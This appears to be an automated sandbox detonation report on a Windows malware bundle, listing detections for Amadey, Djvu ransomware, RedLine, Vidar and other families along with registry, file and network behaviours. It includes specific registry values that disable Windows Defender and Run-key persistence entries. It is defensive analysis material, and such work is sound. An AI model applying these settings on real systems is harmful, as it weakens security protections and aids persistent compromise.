memory/2336-201-0x0000000000100000-0x0000000000159000-memory.dmp
memory/2336-202-0x0000000000100000-0x0000000000159000-memory.dmp
memory/2496-203-0x0000000000000000-mapping.dmp
memory/1088-204-0x0000000000FB0000-0x0000000000FD2000-memory.dmp
memory/2544-207-0x0000000000000000-mapping.dmp
memory/2536-210-0x0000000000000000-mapping.dmp
memory/2604-213-0x0000000000000000-mapping.dmp
memory/2616-214-0x0000000000000000-mapping.dmp
memory/364-217-0x00000000026B0000-0x00000000026E0000-memory.dmp
memory/364-218-0x0000000002820000-0x0000000002850000-memory.dmp
memory/364-219-0x0000000000C91000-0x0000000000CBC000-memory.dmp
memory/364-220-0x00000000002A0000-0x00000000002D8000-memory.dmp
memory/364-222-0x0000000000400000-0x0000000000A93000-memory.dmp
memory/2716-223-0x0000000000000000-mapping.dmp
memory/2748-225-0x0000000000000000-mapping.dmp
memory/1900-226-0x0000000000400000-0x0000000000C96000-memory.dmp
memory/1520-227-0x00000000001C0000-0x0000000000219000-memory.dmp
memory/1996-228-0x00000000023C0000-0x000000000240D000-memory.dmp
memory/1440-229-0x0000000002700000-0x0000000002759000-memory.dmp
memory/1520-230-0x0000000001390000-0x00000000013E9000-memory.dmp
memory/1520-231-0x00000000001C0000-0x0000000000219000-memory.dmp
memory/1996-232-0x0000000000C71000-0x0000000000C9E000-memory.dmp
memory/2716-234-0x0000000002640000-0x0000000002674000-memory.dmp
memory/2716-235-0x00000000028F0000-0x0000000002924000-memory.dmp
memory/1520-237-0x00000000001C0000-0x0000000000219000-memory.dmp
memory/1060-238-0x00000000024E0000-0x0000000002B65000-memory.dmp
memory/1440-236-0x0000000002700000-0x0000000002759000-memory.dmp
memory/2716-239-0x0000000000240000-0x0000000000340000-memory.dmp
memory/2896-241-0x0000000000000000-mapping.dmp
memory/2716-240-0x00000000003C0000-0x00000000003FA000-memory.dmp
memory/2716-243-0x0000000000400000-0x0000000000A93000-memory.dmp
memory/2896-244-0x00000000011A0000-0x00000000011AE000-memory.dmp
memory/2956-245-0x0000000000000000-mapping.dmp
memory/2336-247-0x0000000001390000-0x00000000013E9000-memory.dmp
memory/2336-248-0x0000000000100000-0x0000000000159000-memory.dmp
memory/2992-249-0x0000000000000000-mapping.dmp
memory/3004-250-0x0000000000000000-mapping.dmp
memory/1440-253-0x0000000003EE0000-0x0000000004163000-memory.dmp
memory/364-254-0x0000000000C91000-0x0000000000CBC000-memory.dmp
memory/1460-255-0x0000000000000000-mapping.dmp
memory/2716-257-0x0000000000240000-0x0000000000340000-memory.dmp
memory/1068-258-0x0000000000130000-0x00000000002F0000-memory.dmp
memory/1068-259-0x0000000004950000-0x00000000049DE000-memory.dmp
memory/1068-260-0x0000000000BE0000-0x0000000000C2C000-memory.dmp
memory/568-261-0x0000000000000000-mapping.dmp
memory/1060-263-0x0000000000BC0000-0x0000000000D5D000-memory.dmp
memory/568-264-0x0000000068F20000-0x00000000694CB000-memory.dmp
memory/1060-265-0x00000000009F0000-0x0000000000BE2000-memory.dmp
memory/568-266-0x0000000068F20000-0x00000000694CB000-memory.dmp
memory/2716-267-0x0000000000240000-0x0000000000340000-memory.dmp
memory/2716-268-0x0000000000400000-0x0000000000A93000-memory.dmp
memory/1060-269-0x00000000009F0000-0x0000000000BE2000-memory.dmp
memory/364-270-0x0000000000C91000-0x0000000000CBC000-memory.dmp
memory/364-271-0x0000000000400000-0x0000000000A93000-memory.dmp
memory/1088-272-0x0000000000400000-0x0000000000885000-memory.dmp
memory/1900-273-0x0000000000400000-0x0000000000C96000-memory.dmp
memory/2172-274-0x0000000000400000-0x0000000000C96000-memory.dmp
memory/2000-275-0x0000000000321000-0x000000000034E000-memory.dmp
memory/2320-278-0x0000000000000000-mapping.dmp
memory/2728-279-0x0000000000000000-mapping.dmp
memory/2264-282-0x0000000000000000-mapping.dmp
memory/2964-287-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2964-288-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2964-290-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2964-291-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2964-292-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2964-293-0x000000000041824E-mapping.dmp
Analysis: behavioral2
Detonation Overview
| Submitted | 2022-07-05 10:59 |
| Reported | 2022-07-05 11:07 |
| Platform | win10v2004-20220414-en |
| Max time kernel | 450s |
| Max time network | 453s |
Command Line
Signatures
Amadey
Colibri Loader
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Glupteba
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
Modifies visibility of file extensions in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" | N/A | N/A |
Modifies visibility of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | N/A | N/A |
PrivateLoader
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5248 created 1624 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe |
| PID 5248 created 4588 | N/A | C:\Windows\system32\svchost.exe | C:\Windows\rss\csrss.exe |
| PID 5248 created 4588 | N/A | C:\Windows\system32\svchost.exe | C:\Windows\rss\csrss.exe |
| PID 5248 created 4588 | N/A | C:\Windows\system32\svchost.exe | C:\Windows\rss\csrss.exe |
| PID 5248 created 2892 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe |
| PID 5248 created 2892 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe |
Vidar
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Generic gate .php GET with minimal headers
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE Win32/Colibri Loader Activity
suricata: ET MALWARE Win32/Colibri Loader Activity M2
suricata: ET MALWARE Win32/Colibri Loader Activity M3
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\RunDll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\ProgramData\50543188494393494002.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\6DF1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\EH46E.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7BCD.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4A1B.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3A8A.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4A1B.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses 2FA software files, possible credential harvesting
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Windows\SysWOW64\rundll32.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" | C:\Users\Admin\AppData\Local\Temp\0BB4J.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wzocvkk = "\"C:\\Users\\Admin\\AppData\\Roaming\\Okjeqdz\\Wzocvkk.exe\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\signed.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Driver Service = "C:\\ProgramData\\MsDrvSrvc.exe" | C:\Users\Admin\AppData\Local\Temp\signed.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\72bf7303-5dc0-44e9-87d8-698f8677acab\\kdnmdIr2m3Z75rmoxMQY45zR.exe\" --AutoStart" | C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\raBkRkUFhLhqVOsAt.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| File created | C:\Windows\Tasks\bamNpdvhtkzLwlCraC.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\6DF1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8AF1.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8AF1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\6DF1.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\6DF1.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8AF1.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
